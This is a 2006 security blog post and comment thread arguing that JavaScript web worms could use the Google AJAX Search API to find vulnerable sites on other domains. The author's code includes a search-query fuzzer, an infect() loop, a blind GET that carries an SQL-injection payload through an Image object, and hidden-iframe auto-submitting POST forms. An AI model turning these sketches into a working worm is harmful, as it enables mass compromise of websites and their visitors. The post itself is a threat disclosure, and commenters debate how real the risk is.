Google Search API Worms

Thu, 14 Sep 2006 10:17:52 GMT
by pdp

One of the main disadvantages of AJAX is the lack of cross-domain request capabilities. In simple words, a web object from one site cannot access another one from a different site. This security feature is enforced by every modern browser's security sandbox, which is responsible for keeping your personal information private and safe.

Unfortunately, with the rise of AJAX-enabled applications, the need to break out of the security sandbox receives a lot of enthusiastic support among AJAX developers. Even Google, one of the biggest AJAX evangelists today, provides JavaScript APIs to allow developers to mash up their services with Google's enormous computing capabilities. As a result, Google unintentionally enables various types of worms to crawl and exploit the web.

The service that concerns me the most is the Google AJAX Search API, the new JavaScript-powered search widget. In this article I will cover how to mash up with Google's new service in a very simple way and explain why and how it can be used by web malware to propagate. The source code provided in this article will be available in the next AttackAPI 0.7 release.

First of all, it is essential to understand how to use the API. The technique is actually quite simple: it involves a SCRIPT element whose URL carries a request to Google the JSON way. For example:

<script>
  // the second argument of the callback holds the result set returned by Google
  function myCallback(a, b, c, d) {
    alert(b.results[0].title);
  }
</script>
<script src="http://www.google.com/uds/GblogSearch?callback=myCallback&context=0&lstkp=0&rsz=small&hl=en&q=Google&key=internal-documentation&v=0.1" type="text/javascript"></script>

Upon execution, the code above retrieves the title of the first entry in the result set and displays it in an alert box. The reader may expand on that technique.

Going back to my example, the entire logic is carried by the SCRIPT element. There are several important bits in the SCRIPT URL that need to be understood. The first one is the callback field: the name of the function that handles the response. The second important field is the key. Google has a flexible system where keys are issued per URL; in this example the key is the generic one that can be found in all of Google's examples. The last important bit is the actual query, which holds the terms that will be evaluated by Google. When loaded by the browser, the SCRIPT element evaluates the content pointed to by the URL in its src attribute, which results in a call to the callback function.

That is all that is required in order to make Google queries via JavaScript. There is a minor restriction introduced by Google, though: there is no way to go deeper into the result set. Google will give you only the results that it believes are the most interesting and nothing more. However, this restriction can be easily circumvented by introducing diversity in the query terms. For example, "intranet ext:aspx", "admin ext:aspx" and "aspx ext:aspx" produce different results, yet they all refer to *.aspx files. So by using a query fuzzer which randomizes the search phrase, more results can be extracted.
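
A minimal sketch of such a fuzzer, reusing the request format from the example above (the seed terms, function names and query are purely illustrative):

<script>
  // sketch only: seed terms, names and the query are illustrative
  var seeds = ['intranet', 'admin', 'login', 'upload'];

  // glue a random seed onto the base query to diversify the search phrase
  function fuzzQuery(base) {
    var seed = seeds[Math.floor(Math.random() * seeds.length)];
    return encodeURIComponent(seed + ' ' + base);
  }

  // handles the response, just like myCallback in the earlier example
  function fuzzCallback(a, b, c, d) {
    // b.results holds the current batch of results
  }

  // fire the request by appending a dynamic SCRIPT element
  var script = document.createElement('script');
  script.type = 'text/javascript';
  script.src = 'http://www.google.com/uds/GblogSearch?callback=fuzzCallback'
             + '&context=0&lstkp=0&rsz=small&hl=en&q=' + fuzzQuery('wordpress')
             + '&key=internal-documentation&v=0.1';
  document.getElementsByTagName('head')[0].appendChild(script);
</script>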

Knowing how to use Google AJAX Search API is only one side of the story. The other one and probably the most interesting one is how this can be used by web worms. Let's have a look at a couple of examples.

Web worms can use Google's infrastructure to propagate. If a malicious mind finds a vulnerability in WordPress, for example, and this vulnerability allows SQL Injection, a worm may be written to crawl blogs in search of this vulnerability and embed itself into everything that is vulnerable. Once a user visits an infected blog, the worm starts another cycle.

Another worm might crawl random sites, run generic Cross-site Scripting and SQL Injection checks, and send the results to its master, who will use them to release more advanced worms.

Malicious minds can use Google's technology and recently discovered vulnerabilities to create a botnet that can be used for computational tasks, attacks, information gathering and pretty much everything else its masters can come up with.

Unfortunately, I am just the messenger. Although I am not aware of any worms in the wild that make use of this technique, I won't be surprised if I see some in the near future. Malicious content in web pages, Flash, QuickTime and PDF has suddenly become one of the most common threats we face today.

In my mind I picture a protection system similar to what we have with today's AntiVirus agents: a signature scanner that goes through every page we visit. A Firefox extension that can do that could be quite handy.

Archived Comments

Deryck Hodge
So what is the actual security threat? Just being able to search Google for Wordpress blogs if they were vulnerable is not a threat. You can do that a la normal Google search or via the SOAP search API, too. Seems like much ado about nothing to me here.
pdp
The threat is that this can be done from JavaScript without the need for a request proxy. This enables worms such as Samy and Yamaner to infect not only the platform they were written for but other platforms as well. By using Google's AJAX Search API, malicious JavaScript code can discover potential targets and exploit them. I believe that this is a threat.
Deryck Hodge
I'm sorry, but I still don't see it. You say the threat is that "*this* can be done from JavaScript". What is the "this"? Searching Google? So just searching Google via JavaScript is a threat? How? How can a worm propagate via a search query? If I'm misunderstanding you, please forgive.
JD
The Samy worm was able to propagate through MySpace because it was embedded in a page that ran from the same domain as the target (i.e. another MySpace page), so the security restrictions against cross-site scripting were not overcome, they were simply not relevant. In the example you outline, malicious code would be able to search for vulnerabilities, for instance in WordPress. But when it comes to attacking these resources, the script would still have to be able to make an attack on a different domain (such as the domain hosting the blog). It would not be able to do this, because of the security sandbox. The ability of a piece of malicious code to do a search and find a vulnerability doesn't mean that it can exploit it. And running a search on a domain through Google (which is all that "Google's infrastructure" allows you to do through the API) will have no actual effect on that domain, so Google have not opened up a security hole here.
pdp
JD and Deryck, I think that you guys don't understand that making POST and GET requests from JavaScript is quite simple. For example, let's make a GET request:
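A minimal sketch (the target URL is only a placeholder):
<script>
  // assigning a URL to the src property of an Image object fires a GET request
  var img = new Image();
  img.src = 'http://target.example.com/page?param=value';
</script>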
Now let's make a POST request:
<form name="postform" method="POST" action="http://vulnerable.com">
  <input type="hidden" name="params" value="sql_injection_here"/>
  <input type="submit"/>
</form>
<script>
  // submit the form automatically, without any user interaction
  document.postform.submit();
</script>
Put that into an iframe and then you can make the request. So, how hard is that? JD made a very good point: there is a security restriction, so, although I can make POST and GET requests, I cannot see the result. But worms are usually not interested in that. They can search for targets and blindly exploit them. Because in theory JavaScript cannot read information that is coming from a different DOMAIN, it is hard for worms such as Samy and Yamaner to discover targets outside of their own. However, this restriction is bypassed by using the Google Search API, which provides every AJAX developer with programmable search facilities. Now worms can discover targets outside of their current DOMAIN and exploit them.
JD
I see, everything makes sense now. Of course, the worm doesn't have to see the response, it just moves on to the next target etc. Very nasty. In this case, the yahoo search api is also a threat, as it also has the possibility of working via JSON. Also, I believe that google are more on the ball when it comes to blocking url searches that expose weaknesses than yahoo are (they often return a message like "a virus is running searches from your machine" or something like that), which is another reason why a worm might make use of the yahoo api.
srvzro
But searching Google has been used many times to find victims among various types of dynamic websites. This now makes self-propagation easier. Imagine: every time a compromised page is visited, the worm searches the Google API and attempts to infect a different victim. While reviewing the web logs of one of my sites, I found curious GET/POST activity, and when I dug deeper I found a Google referrer link that tried to use an SQL injection exploit for phpBB forums. I'll add the geocities site here for everyone's review. I've tried to contact geocities' abuse contact, but it's been several months now and this site is still up. http://geocities.com/oase_peace/
Deryck Hodge
Dude, you insult me by saying I don't understand that POST and GET are possible via JavaScript. Please. But so what? In your last examples, I don't even need JavaScript. Just do the GET or POST directly on the vulnerable site. And again, it's the *site* that's vulnerable, not Google's API. And your argument that Google's API could somehow propagate worms that take advantage of a group of sites' vulnerabilities is hypothetical at best. Show me the code. Prove it. I don't mean to be harsh, but you're the one who posted this to a set of security lists. So back it up. And honestly, it just plain bothers me when people decry the security risk of running JavaScript when there's nothing there. JavaScript has been used to cause problems in the past and will be again, I'm sure, but please don't scream foul when there's nothing there.
pdp
JD, good point. I am working on the Yahoo Search API already. srvzro, yes, Google has been used for that purpose many times in the past, but never from JavaScript. The thing that attacked your website looks to me like the technique used several years ago where you can make Google hack into pages on behalf of the attacker: all the attacker needs to do is place several links on a page and wait for Google to crawl them. This is still possible today. Deryck, my response wasn't meant to insult you in any way. I was trying to make a point. Did I ever say that the Google Search API is vulnerable? Nope, I don't think so. The Google Search API is not vulnerable; however, it provides facilities that can be used by JavaScript worms to propagate. I am sorry, Deryck, but I am not planning to write a JavaScript worm just to prove my point. Go to the AttackAPI project page and write one yourself, or maybe you can prove me wrong by presenting at least 3 reasons why the Google Search API CANNOT be used by JavaScript worms. :) Are you really saying that the Google Search API cannot be used by JavaScript worms? Seriously, how many worms were written in the past that made use of Google search facilities? Yes, they were all written in Perl and C. Now this search facility is brought to JavaScript as well. Is it so hard to understand that this can be used in a malicious way? This response wasn't meant to insult you or flame you but to prove my point. You are the only person I know who is claiming that the Google Search API is not a threat. My post to FD was meant to send a message, a security notice if you like. We fight against all sorts of malware, and those written in JavaScript will be the ones that are harder to detect and remove.
Deryck Hodge
Believe me, I'm not mad. And I don't mean to continue what seems a pointless debate. I believe you are as stubborn as I am. :-) However, I don't think it's accurate to say I'm the only one disagreeing with you. I'm the only one on this blog saying this, and there's only three of us here. And in fact, I'm *not* disputing that you could use a search engine to discover information about websites and use that info to exploit vulnerable sites. I'm disputing that a JavaScript API makes this any more possible than any other programming language or API, or even using Google itself "by hand", so to speak. And I also question your example. If I run the JavaScript search API on my site, and I use it to find info about a site -- that info is in JavaScript objects or variables in my browser. Okay, so I've got a list of URLs that I believe are vulnerable. Now what? I can't use XMLHttpRequest to do anything with those URLs from my site. I can't use an iframe. I'd have to navigate to that site either directly or via document.location.href manipulation, and by that point, I'm just executing a regular GET or POST. And any info I had in JavaScript form is lost, unless I used some server-side programming to persist it. You seem to be suggesting that the API allows me to traverse the web in some way. If it did, that would be a bug either in the API or the browser and a security risk. I'm saying you haven't proved this is possible. I may be stubborn, but I'm offering technical examples here. Show me something different, and I promise I'll admit I'm wrong and go away.
pdp
You are right that you cannot use XMLHttpRequest. You are wrong about the iframe, though, and you don't need a server-side language to persist anything whatsoever. Let's say the user has just visited a web page that contains malicious code; a worm if you like. The first thing the worm will do is perform some malicious activity. Let's say that this is a harmless worm and it is designed to annoy the user. So here is the first piece of code:
<script>
  alert('this page has been compromised by a worm');
</script>
The next thing the worm will do is to find other vulnerable targets to exploit. The worm uses Google AJAX Search API for that purpose.
<script>
  function callback(results) {
    ...
    ...
    ...
  }
  AttackAPI.GoogleSearch.search(callback, query);
</script>
What the callback function does is to handle the results provided by Google AJAX Search API. So let's say that 10 vulnerable applications are found:
  1. http://www.example.com/app
  2. http://www.bla.com/path/to/app
  3. ...
  4. ...
  5. ...
  6. ...
  7. http://www.alabala.com/hidden/path/to/app
  8. ...
  9. ...
  10. ...
The worm takes the results and puts them into a loop that infects all of them with new copies of itself.
<script>
  // URLs holds the list of vulnerable targets collected by the callback
  for (var index = 0; index < URLs.length; index++)
    infect(URLs[index]);
</script>
What the infect function does is send a POST or GET request, NOT VIA XMLHttpRequest, to the vulnerable target. Let's say that in the first scenario we need to send a GET request. How do we do that while bypassing the browser security sandbox?
<script>
  function infect(URL) {
    // assigning src fires a GET request that carries the payload to the target
    var img = new Image();
    img.src = URL + '?var1=[sql_injection put a javascript payload here]';
  }
</script>
Since var1 is vulnerable to SQL Injection, when the Image object tries to fetch an image (i.e. makes a GET request) a JavaScript payload is sent to the vulnerable app. Let's say that this request results in JavaScript code being injected into the top blog entry. This means that users accessing the attacked website will come across the same worm and the cycle will restart. Now let's say that instead of a GET a POST is needed. So how do we do that? We don't want to redirect the user, do we? The solution is very simple:
  1. Make a hidden iframe
  2. Make a form inside setting its method to POST
  3. Make a field and set its name to var1 and its value to [sql_injection put a javascript payload here]
  4. Call form submit() method.
Upon execution the iframe will navigate to the URL to which the POST is made. Since it is hidden, the user cannot see what is happening in the background. Again, the actual redirection after submitting the form happens inside the iframe, not in the current document. I am not going to present source code for how to do that in practice... it will be a bit longer than the first example. However, please go ahead and read on this topic and it will get a lot clearer. Research Cross-site request forgery. If the Google AJAX Search API wasn't there in the first place, the worm propagation would not be possible, simply because JavaScript is not able to read content that does not successfully pass the same origin checks. This means that a worm can propagate only on resources that match the current protocol, domain and port. Thanks for your stubbornness :). I believe that the situation is a lot clearer now for the readers of this blog.
Deryck Hodge
Thanks for the detailed example. That's all I wanted, not an actual worm. And no, I'm not doing anything stupid. :-) Feel free to Google my name, and I think you'll find I have a solid history of building websites and web tools, not exploiting weak ones. As for your example, it's clearer now what you mean, but it's really just more of what you said earlier. I don't know how to make my argument any clearer. You're just illustrating classic XSS -- 1) Find a list of vulnerable sites 2) Insert malicious JavaScript 3) Rinse and repeat :-) The vulnerability is with the site(s) you discover, not the API. So how does being able to search for the list of sites via JavaScript pose any more of a threat than being able to search for vulnerable sites by more "traditional" means? That's all I'm suggesting... that this is a hypothetical case, and not a real threat to very many, if anyone. It depends on a) an already existing vulnerability, and b) those vulnerable sites to be running the Google search API. I hope my point, like yours, is now clear. I don't want to take up more of your blog than I already have (and I appreciate your discussion). Feel free to take this off list with me -- deryck AT samba DOT org -- if you want to discuss further.
pdp
No worries mate. Deryck, actually I am glad that we had this discussion. You are right that this is a classical example of a worm and by nature it is not any different. However, what is different about Google AJAX Search API worms is that they are written in JavaScript. Yes, there are other worms written in JavaScript but they were all restricted to the same SITE/DOMAIN. As I said earlier, I am just the messenger. There are no solutions available right now to fight this kind of worm. Moreover, JavaScript is quite a powerful language which allows code to morph, which makes detection quite hard. There is one more thing that I would like to make clear as well. You are saying there are two requirements for such worms:
a) an already existing vulnerability, and b) those vulnerable sites to be running the Google search API.
You are right for the first one but not for the second one. :) Thanks for your comments.
Blad3
Hey, I finally got it also :P Thanks Deryck Hodge. Sometimes, stubbornness is a quality.
bedo
> In my mind I picture a protection system similar to what we have with today's AntiVirus agents; a signature scanner that goes through every page we visit. A Firefox extension that can do that can be quite handy.
Interesting, as they are getting Browser Shield for IE into life sooner. Although they claim to prevent "malicious content" (0-day or unpatched exploits for IE) on web sites, this may also mean "JavaScript malware", as they put it nowadays. So that means the effort to write such a tool is worth it. After all, this is not about writing a solid browser, or is it? Nice work.
chown
You guys are missing something. I'm not sure about IE, but Firefox certainly doesn't allow scripts to access iframes. And also, you seem to be relying on some extremely abundant SQL injection vulnerability. Not only that, but the ability to exploit it - with javascript. SQL injection is pretty much impossible to automate.
chown
"SQL injection vulnerability can be exploited with a single URL." That's not possible. You cannot exploit multiple different vulnerabilities with a single attack. Nearly all databases are completely different, and saying you can gain access to any database with a single URL is quite simply ludicrous. Believe me, if it were at all possible, in any way, shape or form, to create an effective Javascript worm - one that could effect multiple domains, it would have been done a long time ago.
pdp
OK, let's imagine that there is a popular blogging package that is vulnerable to SQL Injection. The vulnerability occurs when SQL meta characters are submitted into an unsanitized hidden field of the comment submission form. In that respect, if someone inputs a single quote into this field, the resulting page will be an error dump. Is it possible for a JavaScript worm to propagate via this vulnerability? I am saying that it is absolutely possible. Let's have a look at the test scenario specified above. The worm can enumerate blogs by using the Google AJAX Search API. Once a blog is found, the worm will blindly submit a comment with special SQL statements inside to tamper with the backend database. This can be quite simple or complex depending on how the application is written. The worm is spreading! :) Yey! How do we submit comments, you may ask? The answer is via GET and POST. Can JavaScript applications do blind GET and POST? Yes! Some blogging packages accept only POST, others accept both. If it is a Java Servlet application there is a high chance of the second. But this doesn't matter: both GET and POST can be performed from JavaScript. Not to mention that the entire process can be automated absolutely 100%, because the application is known and its behavior can be studied in order to make the worm more stable.
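A minimal sketch of such a blind comment submission via a hidden iframe (the blogURL argument, the /comments action and the field name are purely illustrative, not taken from any real blogging package):
<script>
  // sketch only: the action path and field name are illustrative
  function blindComment(blogURL, payload) {
    // hidden iframe so the POST happens silently in the background
    var frame = document.createElement('iframe');
    frame.name = 'hiddenframe';
    frame.style.display = 'none';
    document.body.appendChild(frame);

    // form that targets the hidden iframe instead of the current page
    var form = document.createElement('form');
    form.method = 'POST';
    form.action = blogURL + '/comments';
    form.target = 'hiddenframe';

    var field = document.createElement('input');
    field.type = 'hidden';
    field.name = 'comment';
    field.value = payload; // the SQL meta characters go here
    form.appendChild(field);

    document.body.appendChild(form);
    form.submit();
  }
</script>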
atomic1fire
idiot style: worm sees hole, worm uses google to find more copies of that hole
pato
If a browser sandbox doesn't allow obtaining data from a different domain, how can any site show dynamic Google content? How does the Google AJAX API work? Isn't it using XMLHTTP?
pdp
The Google AJAX Search API works with SCRIPT elements. This technique is also known as JavaScript on demand, or JSON. Basically, a dynamic SCRIPT element is created that points to a remote URL which, when fetched, generates JavaScript that is evaluated inside the current browser. Since there are no cross-domain restrictions on SCRIPT elements, this mechanism is quite suitable for implementing cross-domain functionality.
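A minimal sketch of the mechanism (the endpoint and callback name are placeholders):
<script>
  // the remote response is plain JavaScript that calls back into this function
  function handleResults(context, results) {
    // work with the results here
  }

  // create a dynamic SCRIPT element pointing at the remote service
  var script = document.createElement('script');
  script.type = 'text/javascript';
  script.src = 'http://remote.example.com/service?callback=handleResults&q=test';
  document.getElementsByTagName('head')[0].appendChild(script);
</script>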
wasnewbie
I wonder if XSS on victim sites has to be of the persistent type in order for this worm to spread on a much larger scale.
pdp
wasnewbie, persistence is definitely a big plus. However, worms that abuse the Google AJAX Search API can use some sort of semi-persistent method with dynamically generated MOV, MP3 or SWF objects through the method I discussed here. For example, the worm can generate a dynamic SWF that mimics the Google Video or YouTube video player. After the movie is previewed, the user will be asked to share the object with others or blog it on their website. I know that it requires user interaction, but let's be honest, people will happily do what they are asked to.
Tom
A lot of Joomla sites were compromised by a series of attacks lately, using GET/POST methods. It wasn't Joomla itself, actually - it was several 3rd party components for the popular CMS. My point is... I do believe that a single attack can affect multiple sites... or let's say a single attack running over and over, automated. Someone just unleashes it and it crawls the web like a search engine, finding vulnerable sites... however, to chown's point, it has to be the EXACT SAME circumstance... To pdp's point, that's not really all too uncommon - especially because of the one example I just made about the CMS. All this means is developers need to be more careful. Generally speaking, a worm that runs SQL injection is probably easier to cut off at the head than other attacks... because a pattern can VERY easily be established and developers can fix the problem. Hopefully no one is using a compromised application for anything important such as payment transactions, etc. ... if there were a vulnerability with, say, a PayPal site and someone were able to inject some SQL to change around where money is being sent... well, not hard to catch the person, but WOW, what a mess. There is a big potential for disaster, but it's not a reason not to use Google's APIs. It's just that you need to understand you are advertising your system to the world... which many people want to do anyway - we all want more web traffic... just not the malicious kind. Of course Google's Code Search also presents dangers too. Though I'm sure that takes more of a manual, labored approach for the script kiddies... where's the fun in that?
anyone
hi, thankx for the useful info :)
Computer Security Tips
Computer Security Tips... I couldn't understand some parts of this article, but it sounds interesting...
TruePath
So I have to admit I'm still confused. Are you advocating that client-side scripting languages be denied *ANY* means of retrieving search data? After all, the way you stated your example, it doesn't matter in the slightest how the JS gets the information, so the only way to protect against this would be to deny ANY kind of Google query from JS (or require user input or something). I agree the ability to get search results makes JS worms slightly more dangerous, but only slightly. After all, the author of the worm could merely release 50-100 worms into the wild, each of them containing their own subset of compressed search queries (doing the searches beforehand). Additionally, I would think the API key would prevent this sort of attack from going very far. If you are trying to run this as a worm, you will need a new API key for every domain you infect, no? (And if somehow you can use the same one, won't Google notice and shut you down?) I suppose there is some chance you could try to grab the API key from the website you are attacking if it has one, but that sounds mega-hard and less efficient than just preloading the data. Moreover, if you have a server vulnerable to an SQL injection attack discoverable via Google, any number of baddies can attack it directly, so the extra risk seems like not much to worry about.
pdp
TruePath, you have some valid points here, although I believe that this is just the beginning of the exploration. The more versatile AJAX technology becomes, the more often it will be used for malicious activities. P.S. you can use Google's own internal key. They use that key for all their examples. That one works everywhere, on every domain.
TruePath
Ahh, I stand corrected on the key point. Thanks for letting me know.
Mr-Yellow
Problem: the results returned on each iteration are the same results, so no viral spread. The worm would have to integrate new keywords into its search on each new target so as to get a fresh set of targets, while the point of its search is looking for specifically exploitable paths/signatures. Additional keywords could be used to narrow down the results and get some fresh URLs, but not easily. JSON makes this a little easier but isn't something that was impossible before: hitting pages and parsing results from an HTML response is exactly the same as hitting some XML and parsing that, just a little more code.
Martien de Jong
I have seen code like this in action; the result is pretty devastating. Anyway, I think the fault is not Google's. Websites just should not have vulnerabilities. If you have a dark room with all your belongings in it, will you blame someone who hands you a flashlight?
Peter Teoh
You are absolutely right that such a worm can be constructed. One solution is characterizing and fingerprinting every possible URL (limited to the first few words) that can enter the system, so that any anomalous URL constructed in an attempt to enter the system is subjected to additional checks/filtering/sandboxing or whatever have you. Normally the server side should not originate outgoing traffic to the internet - if it starts another HTTP request on port 80 to another server, then propagation is always possible. But I am thinking - even if originating outgoing traffic is banned, the server (assuming an XSS-compromised attack) can always initiate a client-side HTTP refresh mechanism to attack another server, thus indirectly propagating from one server to another server nevertheless, correct?